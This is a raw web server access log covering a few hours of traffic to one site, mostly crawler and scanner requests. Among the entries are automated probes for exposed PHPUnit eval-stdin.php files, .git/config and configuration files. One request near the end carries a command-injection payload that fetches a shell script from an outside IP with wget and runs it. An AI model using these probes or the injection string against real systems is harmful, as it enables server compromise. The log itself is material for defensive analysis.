129.159.27.80 - - [04/Mar/2025:20:32:52 +0100] "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1" 404 390 "-" "Custom-AsyncHttpClient"
129.159.27.80 - - [04/Mar/2025:20:32:59 +0100] "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 402 "-" "Custom-AsyncHttpClient"
129.159.27.80 - - [04/Mar/2025:20:33:05 +0100] "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 388 "-" "Custom-AsyncHttpClient"
129.159.27.80 - - [04/Mar/2025:20:33:12 +0100] "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 384 "-" "Custom-AsyncHttpClient"
129.159.27.80 - - [04/Mar/2025:20:33:20 +0100] "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 380 "-" "Custom-AsyncHttpClient"
129.159.27.80 - - [04/Mar/2025:20:33:28 +0100] "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 376 "-" "Custom-AsyncHttpClient"
129.159.27.80 - - [04/Mar/2025:20:33:34 +0100] "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 392 "-" "Custom-AsyncHttpClient"
129.159.27.80 - - [04/Mar/2025:20:33:40 +0100] "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 388 "-" "Custom-AsyncHttpClient"
129.159.27.80 - - [04/Mar/2025:20:34:02 +0100] "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 384 "-" "Custom-AsyncHttpClient"
129.159.27.80 - - [04/Mar/2025:20:34:11 +0100] "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 380 "-" "Custom-AsyncHttpClient"
129.159.27.80 - - [04/Mar/2025:20:34:18 +0100] "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 399 "-" "Custom-AsyncHttpClient"
129.159.27.80 - - [04/Mar/2025:20:34:34 +0100] "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 403 "-" "Custom-AsyncHttpClient"
129.159.27.80 - - [04/Mar/2025:20:34:48 +0100] "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 399 "-" "Custom-AsyncHttpClient"
129.159.27.80 - - [04/Mar/2025:20:35:11 +0100] "-" 408 - "-" "-"
109.236.61.115 - - [04/Mar/2025:20:57:25 +0100] "GET / HTTP/1.1" 200 423 "-" "Hello World"
156.59.198.135 - - [04/Mar/2025:21:08:22 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11913500.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [04/Mar/2025:21:12:22 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10742284.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
193.68.89.10 - - [04/Mar/2025:21:20:31 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
45.148.10.35 - - [04/Mar/2025:21:21:28 +0100] "\x16\x03\x01" 400 383 "-" "-"
45.148.10.35 - - [04/Mar/2025:21:21:28 +0100] "GET / HTTP/1.1" 400 383 "-" "-"
45.148.10.35 - - [04/Mar/2025:21:21:28 +0100] "GET / HTTP/1.1" 200 423 "-" "l9tcpid/v1.1.0"
45.148.10.35 - - [04/Mar/2025:21:21:28 +0100] "GET /templates/.git/config HTTP/1.1" 404 292 "-" "l9explore/1.2.2"
45.148.10.35 - - [04/Mar/2025:21:21:28 +0100] "GET /ci/.git/config HTTP/1.1" 404 287 "-" "l9explore/1.2.2"
45.148.10.35 - - [04/Mar/2025:21:21:28 +0100] "GET /docker/.git/config HTTP/1.1" 404 291 "-" "l9explore/1.2.2"
45.148.10.35 - - [04/Mar/2025:21:21:28 +0100] "GET /build/.git/config HTTP/1.1" 404 289 "-" "l9explore/1.2.2"
156.59.198.136 - - [04/Mar/2025:21:24:44 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11810916.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [04/Mar/2025:21:28:47 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10754103.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
92.255.57.58 - - [04/Mar/2025:21:31:19 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
156.59.198.136 - - [04/Mar/2025:21:32:45 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11312123.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
205.210.31.242 - - [04/Mar/2025:21:33:11 +0100] "GET / HTTP/1.0" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
156.59.198.136 - - [04/Mar/2025:21:36:45 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11293538.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [04/Mar/2025:21:40:45 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11046056.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [04/Mar/2025:22:00:47 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12243362.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [04/Mar/2025:22:04:47 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12018029.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [04/Mar/2025:22:08:47 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10668108.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.243.96.135 - - [04/Mar/2025:22:10:51 +0100] "\x16\x03\x01\x05\xa8\x01" 400 383 "-" "-"
156.59.198.135 - - [04/Mar/2025:22:13:11 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10252731.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [04/Mar/2025:22:17:12 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11044973.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
125.228.28.84 - - [04/Mar/2025:22:19:35 +0100] "GET / HTTP/1.0" 200 423 "-" "curl/7.88.1"
122.96.28.183 - - [04/Mar/2025:22:22:13 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
110.177.181.101 - - [04/Mar/2025:22:22:37 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
1.24.16.25 - - [04/Mar/2025:22:22:38 +0100] "GET /layout.php HTTP/1.1" 200 1674 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
59.55.155.148 - - [04/Mar/2025:22:22:39 +0100] "GET /entry.php?id=10441&UIN= HTTP/1.1" 200 2866 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
27.98.228.175 - - [04/Mar/2025:22:22:40 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
170.64.134.120 - - [04/Mar/2025:22:25:44 +0100] "GET /aaa9 HTTP/1.1" 404 280 "-" "Mozilla/5.0 zgrab/0.x"
170.64.134.120 - - [04/Mar/2025:22:26:03 +0100] "GET /aab8 HTTP/1.1" 404 280 "-" "Mozilla/5.0 zgrab/0.x"
170.64.134.120 - - [04/Mar/2025:22:26:23 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x"
204.76.203.15 - - [04/Mar/2025:22:29:56 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
109.236.61.115 - - [04/Mar/2025:22:37:25 +0100] "GET / HTTP/1.1" 200 423 "-" "Hello World"
156.59.198.136 - - [04/Mar/2025:22:50:34 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11320411.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
194.50.16.252 - - [04/Mar/2025:23:07:37 +0100] "GET /appsettings.Development.json HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/116.0"
172.171.245.173 - - [04/Mar/2025:23:13:03 +0100] "GET /hudson HTTP/1.1" 404 280 "-" "Mozilla/5.0 zgrab/0.x"
92.255.57.58 - - [04/Mar/2025:23:13:09 +0100] "GET /actuator/gateway/routes HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
156.59.198.136 - - [04/Mar/2025:23:14:36 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12466700.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
193.68.89.10 - - [04/Mar/2025:23:17:17 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.135 - - [04/Mar/2025:23:18:37 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11213742.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
198.235.24.239 - - [04/Mar/2025:23:21:33 +0100] "GET / HTTP/1.1" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
156.59.198.136 - - [04/Mar/2025:23:22:37 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11331586.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
48.216.197.45 - - [04/Mar/2025:23:25:15 +0100] "MGLNDD_212.69.160.11_80" 400 383 "-" "-"
80.82.77.202 - - [04/Mar/2025:23:29:29 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15"
156.59.198.135 - - [04/Mar/2025:23:41:40 +0100] "GET /renault.activities.at/htdocs/ewp/ew_includes/popups/ew_images/mono_image_map.png HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
92.255.57.58 - - [04/Mar/2025:23:45:41 +0100] "\x16\x03\x01\x05\xa8\x01" 400 383 "-" "-"
194.50.16.252 - - [04/Mar/2025:23:47:22 +0100] "GET /appsettings.Development.json HTTP/1.1" 404 297 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.4.21"
156.59.198.136 - - [04/Mar/2025:23:54:55 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10969095.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.243.96.117 - - [05/Mar/2025:00:04:39 +0100] "\x03" 400 383 "-" "-"
156.59.198.135 - - [05/Mar/2025:00:22:06 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11182077.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
3.143.242.202 - - [05/Mar/2025:00:30:47 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
3.143.242.202 - - [05/Mar/2025:00:30:56 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
3.143.242.202 - - [05/Mar/2025:00:35:08 +0100] "\x16\x03\x01" 400 383 "-" "-"
3.143.242.202 - - [05/Mar/2025:00:35:43 +0100] "\x16\x03\x01" 400 383 "-" "-"
3.143.242.202 - - [05/Mar/2025:00:35:45 +0100] "SSH-2.0-Go" 400 383 "-" "-"
220.133.167.224 - - [05/Mar/2025:00:40:22 +0100] "GET / HTTP/1.0" 200 423 "-" "curl/7.88.1"
47.121.133.117 - - [05/Mar/2025:00:53:15 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://104.248.224.147/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "Hakai/2.0"
156.59.198.135 - - [05/Mar/2025:00:53:31 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12135529.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"